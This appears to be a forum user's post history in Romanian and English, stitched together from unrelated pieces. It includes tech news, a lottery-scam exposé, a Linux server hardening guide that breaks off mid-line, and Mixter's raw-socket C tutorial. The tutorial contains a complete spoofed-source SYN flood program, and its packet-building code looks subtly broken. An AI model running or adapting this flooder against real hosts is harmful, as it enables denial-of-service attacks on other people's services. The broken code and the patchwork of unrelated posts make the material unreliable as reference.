Nytro

Cea mai tare manea, special pentru cei care urasc manelele: http://www.netdrive.ws/198905.html Versurile sunt sigur ca o sa va placa. Prea tare, jur )

Ce mm, tu vrei sa descarci tot ce gasesti? Dati ban

Ce nu merge, da vreo eroare ceva? E copiat in system32 ocx-ul? Exista acolo un folder Skins care sa contina skinul?

Counter Strike 1.6 si cam atat. Si asta cand nu am ce face.

www.mail.yahoo.com Te loghezi de 3 ori corect, pana merge. Ai grija sa nu gresesti datele. Dupa ce ai intrat pe mail, "voala".

Orice! Toate limbaje, intr-un mare fel, sunt la fel. In orice limbaj exista un for, un while, un if. In orice limbaj exista functii. Functiile sunt baza limbajelor. Invata orice limbaj, apoi o sa iti fie foarte usor sa inveti orice alt limbaj.

Sorinel Pustiu - Barosanu no. 1

UPDATE: Microsoft va lansa Windows 7 in limba romana pe 31 octombrie de Catalin Calciu | 26 iunie 2009 Varianta romaneasca a noului sistem de operare al Microsoft - Windows 7 - va fi lansata in 31 octombrie, la noua zile de la intrarea pe piata a versiunii in engleza, au spus pentru Hotnews.ro reprezentantii companiei. In Romania, pretul estimat al licentei Windows 7 va fi in perioada de promotie, care va dura pana la 31 decembrie 2009, de 119,99 euro pentru versiunea Home Premium (discount de aproximativ 110 euro fata de pretul curent de Windows Vista Home Premium). Compania a anuntat joi datele de lansare ale Windows 7 pentru mai multe tari, iar SUA, Canada si Japonia sunt primele unde sistemul se va vinde, incepand de vineri. In 15 iulie Windows 7 va patrunde pe alte trei piete: Franta, Germania si Marea Britanie, dar trebuie mentionat ca in UE browserul Internet Explorer nu va mai fi inclus in pachet. Pana pe 22 octombrie, data de lansare pe plan mondial, vor fi gata versiuni in 14 limbi: engleza, spaniola, japoneza, germana, franceza, italiana, olandeza, rusa, poloneza, portugheza, coreeana, si chineza (trei versiuni). Pe 31 octombrie, Windows 7 va fi disponibil in inca 21 de limbi, printre care bulgara, ucraineana, thailandeza, croata, greaca, turca si evident romana. Fara discount, o licenta Windows 7 in SUA va costa pentru clientii care au deja Vista sau XP 119,99 dolari pentru versiunea Home Premium, 199,99 dolari pentru versiunea professional si 219,99 dolari pentru varianta Ultimate. Pentru clientii complet noi preturile celor trei variante sunt 199,99 dolari, 299,99 dolari si 319,99 dolari. Compania ofera un discount pentru cei care trec de XP sau Vista la Windows 7 pana la 11 iulie in SUA, ei putand cumpara versiunea Windows Home Premium la 49,99 dolari. In Romania, Windows 7 va avea un pret de promotie de 119,99 euro pentru versiunea Home Premium Oficialii Microsoft Romania au precizat pentru HotNews.ro ca "Window 7 Upgrade Option ofera oricarui cumparator care achizitioneaza un PC cu sistem de operare Windows Vista Home Premium, Windows Vista Business sau Windows Vista Ultimate, de la un partener OEM sau retail participant in programul de upgrade, posibilitatea sa faca upgrade la Windows 7 fara niciun cost aditional. Acesta este un program global si va fi valabil pana la 31 Ianuarie 2010". La prima vedere se observa preturi comparabile cu ale actualului Windows Vista, insa exista preturi speciale pentru cei care doresc doar un upgrade de la Windows XP sau Vista, astfel, vor trebui sa plateasca 119.99 dolari pentru Windows 7 Home Premium, 199.99 dolari pentru Professional si 219.99 de dolari pentru Ultimate. Sursa: Vlad Barza / Hotnews.ro

Expertii in securitate au intrat in contact cu infractorii online de Vlad Matei | 1 iulie 2009 Sa fii milionar si sa inoti in bani castigati la loto – un vis impartasit de milioane de persoane de pe tot globul. Indeplinirea acestui vis este promisiunea pe care o face ultimul val de mesaje spam. In aceste e-mailuri, expeditorul promite un premiu de 2 milioane 35 de mii si iti cere in schimb sa il contactezi in cel mai scurt timp prin telefon. Conform estimarilor politiei, aceasta escrocherie este relationata cu transferurile bancare frauduloase sau chiar cu spalarea de bani. Pentru a afla detalii suplimentare despre acest aspect, G Data a initiat investigatii si a contactat forul responsabil cu monitorizarea loteriilor din UE, situat in Madrid. "Aceasta escrocherie nu este una noua, dar faptul ca de data aceasta cei care au pus-o la cale au un numar de telefon la dispozitie care nu este fictiv constituie o noutate. In general, escrocii doresc sa obtina informatii personale sau cu privire la conturile persoanelor vizate de tentativa de frauda. Ultimul “val” de spam-uri este cel mai probabil o campanie de spalare a banilor. Prin urmare, sfatul nostru este ca ele sa fie detectate imediat”, sustine Ralf Benzmüller, manager al Laboratoarelor de Securitate G Data. Oficiali ai politiei germane, contactati de specialistii de la G Data, au confirmat aceste estimari si avertizeaza ca nu trebuie luata legatura sub nici o forma cu forul responsabil cu monitorizarea loteriilor din UE. G Data dorea sa stie ce se petrece de fapt asa ca, un reprezentant al companiei a sunat la numarul din Madrid. La telefon a raspuns un individ amabil care a vorbit in limba germana si s-a recomandat ca angajat al forului responsabil cu monitorizarea loteriilor din UE. A spus ca el nu poate oferi detalii despre castiguri deoarece rolul lui este numai acela de a afla datele de contact. In orice caz, el a confirmat reprezentantului G Data ca suma de 2,35 de milioane de euro este corecta, dar ea poate varia. A sustinut ca numele lui este Randy Peters. G Data a dat mai departe imediat datele colectate catre organele legale abilitate sa se ocupe de caz. Rezumatul convorbirii telefonice cu RANDY PETERS: G Data: Buna ziua, vorbesc cu European Lotto Monitoring Unit (Forul European de Monitorizare a loteriilor)? Am fost anuntat ca am castigat un premiu. RANDY PETERS: Cu cine doriti sa vorbiti? Nu am inteles exact. G Data: Tocmai am primit un email de la dl. Hernandez si sunt foarte nerabdator sa stiu ce se va intampla acum. RANDY PETERS: Ah, sunati datorita mesajului de la Lotto Monitoring. Cum spuneati ca va numiti? G Data: Ma numesc A..... RANDY PETERS: Ati putea repeta, va rog frumos. Nu vorbesc foarte bine limba germana. Pe fundal se poate auzi cum se bate la o tastatura. Operatorul pare sa caute numele intr-o baza de date, pentru a vedea daca este vorba de cineva care a primit un spam de la ei. RANDY PETERS: Din pacate, nu va regasesc numele in baza de date. Mi-ati putea spune numarul dvs. de telefon? I-am oferit interlocutorului un numar special pentru a deservi acest rol. G Data: Chiar am castigat? Chiar este vorba de 2,35 milioane de euro? RANDY PETERS: Da, suma castigata este de 2,35 milioane de euro. Asa este. Noi strangem informatii pe care le trimitem mai departe la Lotto Monitoring pentru procesare si oferirea sumei. G Data: Cat timp va dura pana intru in posesia banilor? Ii obtin pe toti? RANDY PETERS: Da, bineinteles. Nu va pot spune o suma exacta, deoarece castigul va fi impartit. Ar putea fi mai mic. Am nevoie de adresa dvs., de numarul dvs. de telefon si de informatiile dvs. bancare, pentru procesari ulterioare. Aceste informatii sunt trimise mai departe la European Lotto Monitoring Unit. Eu doar colectez aceste informatii. G Data: Exista vreo taxa pe care trebuie s-o achit – nu prea ma pricep la lucrurile acestea. Trebuie sa transfer bani mai intai cuiva sau care e procedura? Am auzit despre fraude. RANDY PETERS: Nu, nu – noi doar va oferim banii. Vor intra in contul dvs. peste cateva saptamani. Nu sunt taxe in afara de cele de procesare. Adica 3,5 % din castig, din contul in care va facem viramentul, de ex. Deci, imi puteti oferi aceste informatii? G Data: Conexiunea telefonica nu este foarte buna. Pot sa va trimit datele prin e-mail? Pe adresa d-lui Hernandez? RANDY PETERS: Da, este OK. Va rog sa va asigurati ca sunt trecute toate detaliile– apoi veti primi prima transa a banilor in prima saptamana. Trebuie doar sa transferati suma pentru procesare dupa ce primiti banii. In acest moment, expertii G Data au incheiat convorbirea telefonica. E-mail spam de la European Lotto Monitoring Unit: European Lotto Monitoring Unit (Departmentul Lotto de procesare) DIRECTORATUL DE PLATI SI TRANSFERURI INTERNATIONALE Paseo de Castellana 64 E-28048 Madrid, Spania 22/06/2009 Procesarea platilor/departamentul de audit Numar intern: ELM/PD/MU/SX027 Re: Plata irevocabila Tocmai am fost autorizati de Presedintele European Lotto Monitoring Unit si de Comitetul Director al Bancii Centrale a Spaniei (Banca Spaniei) sa investigam motivele intarzierii nejustificate a platii; va recomandam sa verificati daca cererile dvs. de plata sunt justificate. In cadrul investigatiilor noastre, am descoperit, spre surprinderea noastra, ca platile au fost intarziate de catre oficiali corupti din organizatie care incearca sa atraga fondurile dvs. in conturile lor proprii. Pentru a stopa acest lucru, s-au luat masuri de securitate pentru bani sub forma securizarii banilor dvs. cu un cod personal de identificare (PIN) si a unui Cod de Acces Transfer (TAC). Aceasta inseamna ca numai dvs. veti fi persoana care va controla direct suma de bani. Mai mult. am incheiat un acord cu presedintia care se va ocupa de efectuarea platilor pentru a preveni ca situatii exceptionale ca cele care au avut loc din vina oficialilor loteriei sa nu se mai repete. In plus, am primit garantii de plata irevocabile pentru dumneavoastra din partea presedintiei. Suntem incantati sa va informam, ca, datorita recomandarilor noastre, suma completa acordata dvs. prin transfer de credit sau prin banci straine partenere, va poate fi oferita. Mai mult decat atat, unitatea noastra va va pune la dispozitie un avocat care va raspunde tuturor intrebarilor dvs. despre transfer si care va garanta securitatea banilor dvs. Prin urmare, va rugam sa-l contactati pe avocatul RANDY PETERS la TEL: +34 645 XXX XXX ; FAX: 34 911 XXX XXX pentru a vi se efectua transferul in cont cu ajutorul codurilor PIN si TAC. El va va prelua apelurile. De indata ce procesul se va finaliza, veti primi suma de 2.350.000 de euro (doua milioane trei sute cincizeci de mii), direct in contul dvs. Asteptam raspunsul dvs. cat mai repede, pentru a urgenta procesul. Cu stima, JOSE M. HERNANDEZ DIRECTOR GENERAL

The Pirate Bay vandut, va renunta la tracker si torentele ilegale de Andrei Rahmanov | 1 iulie 2009 Zi neagra pentru pirateria de pe internet. Siteul The Pirate Bay (Download music, movies, games, software! The Pirate Bay - The world's largest BitTorrent tracker) a fost vandut si se pare ca foarte curand va inceta orice fel de activitati de gazduire si sharing ilegal al fisierelor. The Pirate Bay (TPB) este unul dintre cele mai mari si mai cunoscute siteuri de file-sharing de pe internet. Peste 90% din fisierele dowloadate de pe acest site reprezenta torrente ilegale ale unor materiale protejate de drepturi de autor. Desi TPB sustine ca va incerca sa gaseasca o cale de a oferi utiliaztorilor sai acelasi continut ca si pana acum, in mod gratuit, lucrurile nu par atat de simple. Compania care tocmai a cumparat TPB, Global Gaming Factory X (GGF), este tranzactionata public la bursa si nu is va putea permite sa intre in aceleasi incurcaturi juridice din cauza materialelor ilegal distribuite, incurcaturi care au obligat recent TPB la plata unei sume de 3,9 milioane de dolari in amenzi si cheltuieli de judecata. Cel putin pentru moment a fost anuntat ca The Pirate Bay isi va inchide clientul de BitTorrent si nu va mai gazdui torrente. TPB sustine ca aceasta masura are rolul de a descentraliza intr-o oarecare masura lumea torrentelor si de a-i face pe utilizatori mai putin dependeti de timpul de upload de pe serverele TPB. Odata cu siteul a fost vanduta si compania care il detinea, Peerialism, care a anuntat ca are un nou sistem de sharing peer-to-peer al fisierelor, care il va inlocui pe cel vechi. Desi TPB spune ca va incerca sa gaseasca o cale de a oferi utiliaztorilor sai acelasi continut ca si pana acum, in mod gratuit, lucrurile nu par atat de simple. Compania care tocmai a cumparat TPB este tranzactionata public la bursa si nu is va putea permite sa intre in aceleasi incurcaturi juridice din cauza materialelor ilegal distribuite, incurcaturi care au obligat TPB la plata unei sume de 3,9 milioane de dolari in amenzi si cheltuieli de judecata. Chiar daca siteul avea pana acum milioane de vizitatori zilnic, castigurile din publicitate nu ar fi indeajuns pentru a plati drepturile de autor pentru toate fisierele puse la dispozitie pe site, astfel incat pentru cele mai multe downloadul s-ar putea face contracost. Cum un pirat adevarat n-ar plati niciodata pentru fisiere pe care le poate lua din alta parte gratuit, se etimeaza ca traficul TPB va scadea drastic in urmatoarea perioada, iar utilizatorii sai se vor indrepta catre ate siteuri de gen. Siteul a fost cumparat de Global Gaming Factory X (GGF) pentru suma de 7,8 milioane de dolari, suma care reprezinta dublul costurilor procesului pierdut recent de The Pirate Bay. Surplusul de bani rezultat din vanzare va merge catre o fundatie care militeaza pentru "dreptul la exprimare libera".

A brief programming tutorial in C for raw sockets by Mixter for the BlackCode Magazine .mixter security | .home or Warrior2k.com - warrior2k Resources and Information. 1. Raw sockets 2. The protocols IP, ICMP, TCP and UDP 3. Building and injecting datagrams 4. Basic transport layer operations In this tutorial, you'll learn the basics of using raw sockets in C, to insert any IP protocol based datagram into the network traffic. This is useful,for example, to build raw socket scanners like nmap, to spoof or to perform operations that need to send out raw sockets. Basically, you can send any packet at any time, whereas using the interface functions for your systems IP-stack (connect, write, bind, etc.) you have no direct control over the packets. This theoretically enables you to simulate the behavior of your OS's IP stack, and also to send stateless traffic (datagrams that don't belong to a valid connection). For this tutorial, all you need is a minimal knowledge of socket programming in C (see Beej's Guide to Network Programming). I. Raw sockets The basic concept of low level sockets is to send a single packet at one time, with all the protocol headers filled in by the program (instead of the kernel). Unix provides two kinds of sockets that permit direct access to the network. One is SOCK_PACKET, which receives and sends data on the device link layer. This means, the NIC specific header is included in the data that will be written or read. For most networks, this is the ethernet header. Of course, all subsequent protocol headers will also be included in the data. The socket type we'll be using, however, is SOCK_RAW, which includes the IP headers and all subsequent protocol headers and data. The (simplified) link layer model looks like this: Physical layer -> Device layer (Ethernet protocol) -> Network layer (IP) -> Transport layer (TCP, UDP, ICMP) -> Session layer (application specific data) Now to some practical stuff. A standard command to create a datagram socket is: socket (PF_INET, SOCK_RAW, IPPROTO_UDP); From the moment that it is created, you can send any IP packets over it, and receive any IP packets that the host received after that socket was created if you read() from it. Note that even though the socket is an interface to the IP header, it is transport layer specific. That means, for listening to TCP, UDP and ICMP traffic, you have to create 3 separate raw sockets, using IPPROTO_TCP, IPPROTO_UDP and IPPROTO_ICMP (the protocol numbers are 0 or 6 for tcp, 17 for udp and 1 for icmp). With this knowledge, we can, for example, already create a small sniffer, that dumps out the contents of all tcp packets we receive. (Headers, etc. are missing, this is just an example. As you see, we are skipping the IP and TCP headers which are contained in the packet, and print out the payload, the data of the session/application layer, only). int fd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); char buffer[8192]; /* single packets are usually not bigger than 8192 bytes */ while (read (fd, buffer, 8192) > 0) printf ("Caught tcp packet: %s\n", buffer+sizeof(struct iphdr)+sizeof(struct tcphdr)); II. The protocols IP, ICMP, TCP and UDP To inject your own packets, all you need to know is the structures of the protocols that need to be included. Below you will find a short introduction to the IP, ICMP, TCP and UDP headers. It is recommended to build your packet by using a struct, so you can comfortably fill in the packet headers. Unix systems provide standard structures in the header files (eg. ). You can always create your own structs, as long as the length of each option is correct. To help you create portable programs, we'll use the BSD names in our structures. We'll also use the little endian notation. On big endian machines (some other processor architectures than intel x86), the 4 bit-size variables exchange places. However, one can always use the structures in the same ways in this program. Below each header structure is a short explanation of its members, so that you know what values should be filled in and which meaning they have. The data types/sizes we need to use are: unsigned char - 1 byte (8 bits), unsigned short int - 2 bytes (16 bits) and unsigned int - 4 bytes (32 bits) struct ipheader { unsigned char ip_hl:4, ip_v:4; /* this means that each member is 4 bits */ unsigned char ip_tos; unsigned short int ip_len; unsigned short int ip_id; unsigned short int ip_off; unsigned char ip_ttl; unsigned char ip_p; unsigned short int ip_sum; unsigned int ip_src; unsigned int ip_dst; }; /* total ip header length: 20 bytes (=160 bits) */ The Internet Protocol is the network layer protocol, used for routing the data from the source to its destination. Every datagram contains an IP header followed by a transport layer protocol such as tcp. ip_hl: the ip header length in 32bit octets. this means a value of 5 for the hl means 20 bytes (5 * 4). values other than 5 only need to be set it the ip header contains options (mostly used for routing) ip_v: the ip version is always 4 (maybe I'll write a IPv6 tutorial later;) ip_tos: type of service controls the priority of the packet. 0x00 is normal. the first 3 bits stand for routing priority, the next 4 bits for the type of service (delay, throughput, reliability and cost). ip_len: total length must contain the total length of the ip datagram. this includes ip header, icmp or tcp or udp header and payload size in bytes. ip_id: the id sequence number is mainly used for reassembly of fragmented IP datagrams. when sending single datagrams, each can have an arbitrary ID. ip_off: the fragment offset is used for reassembly of fragmented datagrams. the first 3 bits are the fragment flags, the first one always 0, the second the do-not-fragment bit (set by ip_off |= 0x4000) and the third the more-flag or more-fragments-following bit (ip_off |= 0x2000). the following 13 bits is the fragment offset, containing the number of 8-byte big packets already sent. ip_ttl: time to live is the amount of hops (routers to pass) before the packet is discarded, and an icmp error message is returned. the maximum is 255. ip_p: the transport layer protocol. can be tcp (6), udp(17), icmp(1), or whatever protocol follows the ip header. look in /etc/protocols for more. ip_sum: the datagram checksum for the whole ip datagram. every time anything in the datagram changes, it needs to be recalculated, or the packet will be discarded by the next router. see V. for a checksum function. ip_src and ip_dst: source and destination IP address, converted to long format, e.g. by inet_addr(). both can be chosen arbitrarily. IP itself has no mechanism for establishing and maintaining a connection, or even containing data as a direct payload. Internet Control Messaging Protocol is merely an addition to IP to carry error, routing and control messages and data, and is often considered as a protocol of the network layer. struct icmpheader { unsigned char icmp_type; unsigned char icmp_code; unsigned short int icmp_cksum; /* The following data structures are ICMP type specific */ unsigned short int icmp_id; unsigned short int icmp_seq; }; /* total icmp header length: 8 bytes (=64 bits) */ icmp_type: the message type, for example 0 - echo reply, 8 - echo request, 3 - destination unreachable. look in for all the types. icmp_code: this is significant when sending an error message (unreach), and specifies the kind of error. again, consult the include file for more. icmp_cksum: the checksum for the icmp header + data. same as the IP checksum. Note: The next 32 bits in an icmp packet can be used in many different ways. This depends on the icmp type and code. the most commonly seen structure, an ID and sequence number, is used in echo requests and replies, hence we only use this one, but keep in mind that the header is actually more complex. icmp_id: used in echo request/reply messages, to identify the request icmp_seq: identifies the sequence of echo messages, if more than one is sent. The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP provide 65535 different source and destination ports. The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable, since it doesn't use sequence numbers and stateful connections. This means UDP datagrams can be spoofed, and might not be reliable (e.g. they can be lost unnoticed), since they are not acknowledged using replies and sequence numbers. struct udpheader { unsigned short int uh_sport; unsigned short int uh_dport; unsigned short int uh_len; unsigned short int uh_check; }; /* total udp header length: 8 bytes (=64 bits) */ uh_sport: The source port that a client bind()s to, and the contacted server will reply back to in order to direct his responses to the client. uh_dport: The destination port that a specific server can be contacted on. uh_len: The length of udp header and payload data in bytes. uh_check: The checksum of header and data, see IP checksum. The Transmission Control Protocol is the mostly used transport protocol that provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. (See IV. Basic transport layer operations.) struct tcpheader { unsigned short int th_sport; unsigned short int th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_x2:4, th_off:4; unsigned char th_flags; unsigned short int th_win; unsigned short int th_sum; unsigned short int th_urp; }; /* total tcp header length: 20 bytes (=160 bits) */ th_sport: The source port, which has the same function as in UDP. th_dport: The destination port, which has the same function as in UDP. th_seq: The sequence number is used to enumerate the TCP segments. The data in a TCP connection can be contained in any amount of segments (=single tcp datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial sequence is random. th_ack: Every packet that is sent and a valid part of a connection is acknowledged with an empty TCP segment with the ACK flag set (see below), and the th_ack field containing the previous the_seq number. th_x2: This is unused and contains binary zeroes. th_off: The segment offset specifies the length of the TCP header in 32bit/4byte blocks. Without tcp header options, the value is 5. th_flags: This field consists of six binary flags. Using bsd headers, they can be combined like this: th_flags = FLAG1 | FLAG2 | FLAG3... TH_URG: Urgent. Segment will be routed faster, used for termination of a connection or to stop processes (using telnet protocol). TH_ACK: Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection initiation (see IV.). TH_PSH: Push. The systems IP stack will not buffer the segment and forward it to the application immediately (mostly used with telnet). TH_RST: Reset. Tells the peer that the connection has been terminated. TH_SYN: Synchronization. A segment with the SYN flag set indicates that client wants to initiate a new connection to the destination port. TH_FIN: Final. The connection should be closed, the peer is supposed to answer with one last segment with the FIN flag set as well. th_win: Window. The amount of bytes that can be sent before the data should be acknowledged with an ACK before sending more segments. th_sum: The checksum of pseudo header, tcp header and payload. The pseudo is a structure containing IP source and destination address, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the tcp segment. th_urp: Urgent pointer. Only used if the urgent flag is set, else zero. It points to the end of the payload data that should be sent with priority. III. Building and injecting datagrams Now, by putting together the knowledge about the protocol header structures with some basic C functions, it is easy to construct and send any datagram(s). We will demonstrate this with a small sample program that constantly sends out SYN requests to one host (Syn flooder). #define __USE_BSD /* use bsd'ish ip header */ #include /* these headers are for a Linux system, but */ #include /* the names on other systems are easy to guess.. */ #include #define __FAVOR_BSD /* use bsd'ish tcp header */ #include #include #define P 25 /* lets flood the sendmail port */ unsigned short /* this function generates header checksums */ csum (unsigned short *buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } int main (void) { int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */ char datagram[4096]; /* this buffer will contain ip header, tcp header, and payload. we'll point an ip header structure at its beginning, and a tcp header structure after that to write the header values into it */ struct ip *iph = (struct ip *) datagram; struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip); struct sockaddr_in sin; /* the sockaddr_in containing the dest. address is used in sendto() to determine the datagrams path */ sin.sin_family = AF_INET; sin.sin_port = htons (P);/* you byte-order >1byte header values to network byte order (not needed on big endian machines) */ sin.sin_addr.s_addr = inet_addr ("127.0.0.1"); memset (datagram, 0, 4096); /* zero out the buffer */ /* we'll now fill in the ip/tcp header values, see above for explanations */ iph->ip_hl = 5; iph->ip_v = 4; iph->ip_tos = 0; iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */ iph->ip_id = htonl (54321); /* the value doesn't matter here */ iph->ip_off = 0; iph->ip_ttl = 255; iph->ip_p = 6; iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */ iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */ iph->ip_dst.s_addr = sin.sin_addr.s_addr; tcph->th_sport = htons (1234); /* arbitrary port */ tcph->th_dport = htons (P); tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */ tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */ tcph->th_x2 = 0; tcph->th_off = 0; /* first and only tcp segment */ tcph->th_flags = TH_SYN; /* initial connection request */ tcph->th_win = htonl (65535); /* maximum allowed window size */ tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack should fill in the correct checksum during transmission */ tcph->th_urp = 0; iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1); /* finally, it is very advisable to do a IP_HDRINCL call, to make sure that the kernel knows the header is included in the data, and doesn't insert its own header into the packet before our data */ { /* lets do it the ugly way.. */ int one = 1; const int *val = &one; if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0) printf ("Warning: Cannot set HDRINCL!\n"); } while (1) { if (sendto (s, /* our socket */ datagram, /* the buffer containing headers and data */ iph->ip_len, /* total length of our datagram */ 0, /* routing flags, normally always 0 */ (struct sockaddr *) &sin, /* socket addr, just like in */ sizeof (sin)) < 0) /* a normal send() */ printf ("error\n"); else printf ("."); } return 0; } IV. Basic transport layer operations To make use of raw packets, knowledge of the basic IP stack operations is essential. I'll try to give a brief introduction into the most important operations in the IP stack. To learn more about the behavior of the protocols, one option is to exame the source for your systems IP stack, which, in Linux, is located in the directory /usr/src/linux/net/ipv4/. The most important protocol, of course, is TCP, on which I will focus on. Connection initiation: to contact an udp or tcp server listening on port 1234, the client calls a connect() with the sockaddr structure containing destination address and port. If the client did not bind() to a source port, the systems IP stack will select one it'll bind to. By connect()ing, the host sends a datagram containing the following information: IP src: client address, IP dest: servers address, TCP/UDP src: clients source port, TCP/UDP dest: port 1234. If a client is located on port 1234 on the destination host, it will reply back with a datagram containing: IP src: server IP dst: client srcport: server port dstport: clients source port. If there is no server located on the host, an ICMP type unreach message is created, subcode "Connection refused". The client will then terminate. If the destination host is down, either a router will create a different ICMP unreach message, or the client gets no reply and the connection times out. TCP initiation ("3-way handshake") and connection: The client will do a connection initiation, with the tcp SYN flag set, an arbitrary sequence number, and no acknowledgement number. The server acknowledges the SYN by sending a packet with SYN and ACK set, another random sequence number and the acknowledgement number the original sequence. Finally, the client replies back with a tcp datagram with the ACK flag set, and the server's ack sequence incremented by one. Once the connection is established, each tcp segment will be sent with no flags (PSH and URG are optional), the sequence number for each packet incremented by the size of the previous tcp segment. After the amount of data specified as "window size" has been transferred, the peer sending data will wait for an acknowledgement, a tcp segment with the ACK flag set and the ack sequence number the one of the last data packet that could be received in order. That way, if any segments get lost, they will not be acknowledged and can be retransmitted. To end a connection, both server and client send a tcp packet with correct sequence numbers and the FIN flag set, and if the connection ever de-synchronizes (aborted, desynchronized, bad sequence numbers, etc.) the peer that notices the error will send a RST packet with correct seq numbers to terminate the connection. - Mixter

Asa mi se pare normal. Da.

Am pus si eu Windows 7 mai de mult, cand era Beta si nu puteam intra in nici un folder, nici My Computer, nici Control panel. Si de atunci nu m-a incantatideea sa il incerc. Dar poate il voi incerca. Insa nu cred ca e nevoie de altceva decat de XP. Are tot ce iti trebuie, tot ce ar trebui sa aibe un sistem de operare.

======================================= |-----------:[iNFO]:------------------| |-------------------------------------| | Title: "Linux Hardening & Security" | | Author: Krun!x | QK | | E-Mail: only4lul@gmail.com | | Home: madspot.org | ljuska.org | | Date: 2009-06-20 | ======================================= Content: 1) Intruduction 2) cP/WHM Installation and cP/WHM Configuration 3) The server and it's services | PHP Installation, Optimization & Security 4) Kernel Hardening | Linux Kernel + Grsecurity Patch 5) SSH 6) Firewall | DDoS Protection 7) Mod_Security 8) Anti-Virus - ClamAV 9) Rootkit 10) The Rest of Shits =================== | 1) Intruduction | =================== I wrote a step by step paper how to secure linux server with cP/WHM and Apache installed. By default, linux is not secured enough but you have to understand there is no such thing as "totally secured server/system". The purpose of this paper is to understand how to at least provide some kind of security to the server. I prefer lsws web-server without any Control Panel at all but for this paper I have used CentOS 5 with cP/WHM and Apache web-server installed since a lot of hosting compaines and individuals are using it. Let's start So, you bought the server with CentOS 5 installed. If you ordered cP/WHM together with the server you can skip 2.1 step ============================================ | 2) cP/WHM installation and configuration | ============================================ 2.1) cP/WHM Installation To begin your installation, use the following commands into SSH: root@server [~]# cd /home root@server [/home]# wget http://layer1.cpanel.net/latest root@server [/home]# ./latest ----------------------------------------------------------------------------------------------------- cd /home - Opens /home directory wget http://layer1.cpanel.net/latest - Fetches the latest installation file from the cPanel servers. ./latest - Opens and runs the installation files. ------------------------------------------------------------------------------------------------------ cP/WHM should be installed now. You should be able to access cP via http://serverip:2082(SSL-2083) or http://serverip/cpanel and WHM via http://serverip:2086(SSL-2087) or http://serverip/whm. Let's configure it now. 2.2) cP/WHM Configuration Login to WHM using root username/passwd serverip or http://serverip/whm WHM - Server setup - Tweak Security: ------------------------------------- Enable open_basedir protection Disable Compilers for all accounts(except root) Enable Shell Bomb/memory Protection Enable cPHulk Brute Force Protection WHM - Account Functions: ------------------------- Disable cPanel Demo Mode Disable shell access for all accounts(except root) WHM - Service Configuration - FTP Configuration: ------------------------------------------------- Disable anonymous FTP access WHM - MySQL: ------------- Set some MySQL password(Don't set the same password like for the root access) -If you don't set MySQL password and if someone upload shell(E.G c99) on some site on server he will be able to login into the DB with username "root" without password and delete/edit/download any db on that server WHM - Service Configuration - Apache Configuration - PHP and SuExec Configuration -------------------- Enable suEXEC - suEXEC = On When PHP runs as an Apache Module it executes as the user/group of the webserver which is usually "nobody" or "apache". suEXEC changes this so scripts are run as a CGI. Than means scripts are executed as the user that created them. With suEXEC script permissions can't be set to 777(read/write/execute at user/group/world level) =============================================================================== | 3) The server and it's services | PHP Installation, Optimization & Security | =============================================================================== 3.1) Keep all services and scripts up to date and be sure that you running the latest secured version. On CentOS type this into SSH to upgrade/update services on the server. [root@server ~]# yum upgrade or [root@server ~]# yum update 3.2) PHP Installation/Update, configuration and optimization + Suhosin patch First download what you need, type into SSH the following: root@server [~]# cd /root root@server [~]# wget http://www.php.net/get/php-5.2.9.tar.bz2/from/this/mirror root@server [~]# wget http://download.suhosin.org/suhosin-patch-5.2.8-0.9.6.3.patch.gz root@server [~]# wget http://download.suhosin.org/suhosin-0.9.27.tgz Untar PHP root@server [~]# tar xvjf php-5.2.9.tar.bz2 Patch the source root@server [~]# gunzip < suhosin-patch-5.2.8-0.9.6.3.patch.gz | patch -p0 Configure the source. If you want to use the same config as you used for the last php build it's not a problem but you will have to add enable-suhosin to old config. To get an old config type this into SSH: root@server [~]# php -i | grep ./configure root@server [~]# cd php-5.2.9 root@server [~/php-5.2.9]# ./configure --enable-suhosin + old config(add old config you got from "php -i | grep ./configure" here) root@server [~/php-5.2.9]# make root@server [~/php-5.2.9]# make install Note: If you get an error like make: command not found or patch: Command not found, you will have to install "make" and "patch". It can be done easly. Just type this into SSH: root@server [~]# yum install make root@server [~]# yum install patch Now check is everything as you want. Upload php script like this on the server: <?php phpinfo(); ?> And open it via your browser and you will see your PHP configuration there 3.3) Suhosin Now we can install suhosin patch to get better security and performance. root@server [~]# tar zxvf suhosin-0.9.27.tgz root@server [~]# cd suhosin-0.9.27 root@server [~/suhosin-0.9.27]# phpize root@server [~/suhosin-0.9.27]# ./configure root@server [~/suhosin-0.9.27]# make root@server [~/suhosin-0.9.27]# make install After you installed suhosin you will get something like this: It's installed to /usr/local/lib/php/extensions/no-debug-non-zts-20060613/ Now edit your php.ini. If you don't know where php.ini located it, type this into SSH. root@server [~]# php -i | grep php.ini Configuration File (php.ini) Path => /usr/local/lib Loaded Configuration File => /usr/local/lib/php.ini It means you have to edit /usr/local/lib/php.ini Type into SHH: root@server [~]# nano /usr/local/lib/php.ini If you get an error, nano: Command not found, then: root@server [~]# yum install nano Find "extension_dir =" and add: extension_dir = /usr/local/lib/php/extensions/no-debug-non-zts-20060613/ To save it, CTRL + O and then Enter button. 3.4) We will install Zend Optimizer to get better perfomance: Download Zend Optimizer from Zend Guard - Protect Your IP & Generate More Revenue - Zend.com root@server 